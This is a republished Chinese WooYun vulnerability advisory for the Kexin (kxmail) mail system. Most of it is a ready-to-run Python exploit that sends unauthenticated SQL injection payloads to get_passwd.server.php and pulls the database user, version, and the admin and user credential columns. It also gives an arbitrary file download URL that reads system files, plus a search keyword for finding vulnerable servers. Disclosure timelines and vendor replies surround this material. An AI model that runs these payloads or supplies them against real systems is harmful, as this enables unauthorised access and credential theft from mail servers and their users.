科信邮件系统漏洞注入文件任意下载等小集

admin
admin
admin
102800
文章
87
评论
2015年4月18日20:56:38评论540 views字数 3044阅读10分8秒阅读模式
摘要

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-06: 厂商已经确认,细节仅向厂商公开
2014-07-09: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2014-66892

漏洞标题: 科信邮件系统漏洞注入文件任意下载等小集 科信邮件系统漏洞注入文件任意下载等小集

相关厂商: 科信软件

漏洞作者: Tea

提交时间: 2014-07-03 19:15

公开时间: 2014-09-29 19:16

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

2人收藏

漏洞详情

披露状态:

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-06: 厂商已经确认,细节仅向厂商公开
2014-07-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

简要描述:

存在注入,任意文件下载,无需登录

详细说明:

代码都是加密过了的。。

直接给例子吧:

EXP:

code 区域 
#!/usr/bin/env python
 # -*- coding: utf-8 -*-
 #Author:Tea
 #Date:2014/05/21
 #Ky Mail Sql Injection Exp
 import re
 import sys
 import base64
 import urllib
 import httplib
 
 
 def sendhttp(Url, Sobject):
     RequestUrl = '/prog/get_passwd.server.php'
     Rex = **.**.**.**pile('/w+=*(?=/"/;)')
     data = urllib.urlencode(Sobject).replace('+', '%20')
     headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/html,application/xhtml+xml,application/xml"}
     conn = httplib.HTTPConnection(Url)
     conn.request('POST', RequestUrl, data, headers)
     HttpOpen = conn.getresponse()
     info = base64.b64decode(str(Rex.findall(HttpOpen.read())))
     HttpOpen.close()
     return info
 
 def Get_Info(Urls ):
     Info = [
         '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[/' or 1=1 and 1=2 Union select user()#]]></v></e></xjxobj>',
         '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[/' or 1=1 and 1=2 Union select database()#]]></v></e></xjxobj>',
         '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[/' or 1=1 and 1=2 Union select version()#]]></v></e></xjxobj>',
         '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[/' or 1=1 and 1=2 Union select @@datadir#]]></v></e></xjxobj>',
         '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[/' or 1=1 and 1=2 Union select concat(sys_id,0x3a,sys_user,0x3a,sys_pass) from system_user limit 0,1#]]></v></e></xjxobj>,',
         '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[/' or 1=1 and 1=2 Union select concat(id,0x3a,uid,0x3a,passwd,0x3a,email) from user limit 0,1#]]></v></e></xjxobj>'
     ]
     Result = []
     for i in xrange(len(Info)):
         Urlpars = {
             'xjxfun' : 'DoOperate',
             'xjxargs[]' : Info[i]
         }
         Result.append(sendhttp(Urls, Urlpars))
     return Result
 
 def main():
     if len(sys.argv) != 2:
         print 'Use: %s **.**.**.**' % sys.argv[0]
         sys.exit()
     Vurl = sys.argv[1]
     print 'Author:Tea'
     print '-------------------------------------------------------------------------------'
     Info = Get_Info(Vurl)
     for i in range(len(Info)):
         print 'Info: %s' % Info[i]
 
 if __name__ == '__main__':
     main()

关键字:

powered by kxmail

另外任意文件下载:

http://**.**.**.**/prog/get_composer_att.php?att_size=1623&filenamepath=C:/boot.ini&maxatt_sign=4bc882e8c4a98ac7a97acd321aad4f88&attach_filename=boot.ini

&attach_filename=boot.ini 保存文件名

&filenamepath=C:/boot.ini 下载的文件路径以及文件名

漏洞证明:

漏洞证明:

科信邮件系统漏洞注入文件任意下载等小集

 

科信邮件系统漏洞注入文件任意下载等小集

 

科信邮件系统漏洞注入文件任意下载等小集

修复方案:

都是无需登录,注入,跟任意文件下载,你们比我清楚,看不见代码。

版权声明:转载请注明来源 Tea@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-06 11:06

厂商回复:

CNVD确认并复现所述多个实例情况,由CNVD再次协调软件生产厂商处置,联系科信软件,189 8218 ****,对方不配合处置,后发网站客服邮箱service 。

最新状态:

暂无

 

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

 

登陆后才能进行评分

评价

  2. 2014-07-29 10:14 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    0

    对方不配合处置,后发网站客服邮箱service 哈哈

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2015年4月18日20:56:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   科信邮件系统漏洞注入文件任意下载等小集http://cn-sec.com/archives/16462.html

发表评论

匿名网友 填写信息